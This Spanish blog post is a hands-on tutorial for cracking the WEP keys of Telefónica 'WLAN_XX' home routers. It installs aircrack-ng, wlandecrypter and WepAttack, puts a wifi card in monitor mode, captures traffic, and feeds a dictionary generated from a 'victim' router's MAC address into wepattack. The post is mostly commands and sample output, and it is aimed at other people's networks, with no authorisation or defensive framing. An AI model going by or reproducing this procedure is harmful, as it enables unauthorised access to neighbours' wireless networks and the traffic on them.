101 Libros de Informática Gratis

miércoles, 10 de marzo de 2010

Crackear claves wep de routers de telefonica (WLAN_XX).

Hola, en este post voy a poner un tutorial de como crackear o descifrar claves wep de los routers de telefonica del tipo WLAN_XX.

Este tutorial es para Linux, pero pondré la descarga de archivos para windows.


Yo lo he hecho en Ubuntu Karmic Koala (9.10), debería funcionar en cualquier otra versión y distribución.

Nota: podeis escribir todos los comandos con sudo, o logearos como root en el terminal, escribiendo el siguiente comando: # su.

Primero necesitamos instalar aircrack-ng:

# sudo apt-get install aircrack-ng
Serán necesarias las siguientes librerías para compilar wlandecrypter y wepattack:

# sudo apt-get install zlib1g zlib1g-dev libpcap0.8 libpcap0.8-dev libssl-dev

Nos descargamos el wlandecrypter-1.2.tar.gz desde http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz (la version para windows la descargaís desde aquí: http://www.wifiway.org/archivos/wlandecrypter-1.2.zip) o desde el terminal:

# wget -c http://www.wifiway.org/archivos/wlandecrypter-1.2.tar.gz

Ahora nos descargamos WepAttack-0.1.3.tar.gz desde http://heanet.dl.sourceforge.net/sourceforge/wepattack/WepAttack-0.1.3.tar.gz o desde el terminal:

# wget -c http://heanet.dl.sourceforge.net/sourceforge/wepattack/WepAttack-0.1.3.tar.gz

Instalción wlandecrypter desde, el terminal:

Descomprimimos el archivo:

# tar zxvf wlandecrypter-1.2.tar.gz

# cd wlandecryper-1.2/

# sudo make clean

# sudo make

# sudo make install

Instalción wlandecrypter desde, el terminal:

# tar zxvf WepAttack-0.1.3.tar.gz

# cd WepAttack-0.1.3/

# cd src/

# sudo gedit Makefile     (ir a la línea 24 y poner un espacio entre: "log.o\" ==> "log.o \")

# sudo make clean

# sudo make

# sudomake install

Poner tarjeta wifi en modo monitor:

Para saber si nuestra tarjeta sirve para capturar paquetes de red, podeís mirar esta lista (buscar mas por google por que puede no estar completa).

Primero miramos cual es nuestro interfaz de red wifi:

# iwconfig

Pues a poner nuestra tarjeta en modo monitor:

# sudo airmon-ng start wlan0

Saldrá lo siguiente:

Interface Chipset Driver

wlan0 Atheros ath5k - [phy1]

                      [mode monitor enable in mon0]

Dice que nuestra tarjeta va a trabajar en modo monitor bajo el interfaz mon0.

Buscar la red a atacar:

# sudo airodump-ng -w -0 mon0

(-w guarda los paquetes capturados en un archivo en la carpeta en la cual nos encontremos en el terminal, el nombre del archivo por defecto es: -0-0X.cap donde x es 1 e irá ascendiendo según hagamos capturas diferentes, tambien podemos darle un nombre asi: -w captura, quedando así captura-0x.cap).

Saldrán las redes a nuestro alcance, con esta estructura:

CH 1 ][ Elapsed: 4 s ][ 2010-03-09 23:53

BSSID   PWR    Beacons    #Data,   #/s     CH    MB    ENC    CIPHER    AUTH    ESSID



00:01:38:A9:02:F7   -72    13    1      0       6      54 .     WEP     WEP       WLAN_D7

00:02:CF:B6:41:E3   -88    3     0      0      4       54 .     WEP     WEP       WLAN_42

00:1A:2B:47:D4:96   -88    3     0      0      3       54       WEP      WEP       WLAN_0F

00:23:F8:C9:7D:FB   -89   3     0      0      9       54 .      WEP      WEP       WLAN_66

00:16:38:CB:EE:1C   -93    2    0      0      3       54        WEP       WEP      WLAN_16



             BSSID                       STATION           PWR       Rate     Lost Packets     Probes



00:02:CF:B1:D4:73   00:23:CD:CF:7D:C9      0              0        - 9         0                6


Crackear la clave wep:

Lo que vamos a hacer en realidad es generar en base a la dirección MAC (BSSID) del router-víctima un diccionario de claves, y se lo vamos a pasar al WepAttack para que nos encuentre cuál de ellas es la correcta.

(El que está en amarillo va a ser la victima).

# sudo wlandecrypter 00:01:38:A9:02:F7 WLAN_D7 | wepattack -f -0-01.cap

Donde la mac es la del router-victima, y su ESSID (WLAN_D7).

Y si todo resulta bien:


Pongo un enlace a un video ilustrativo, http://www.youtube.com/watch?v=czv7kBfTN6A.




No hay comentarios:

Publicar un comentario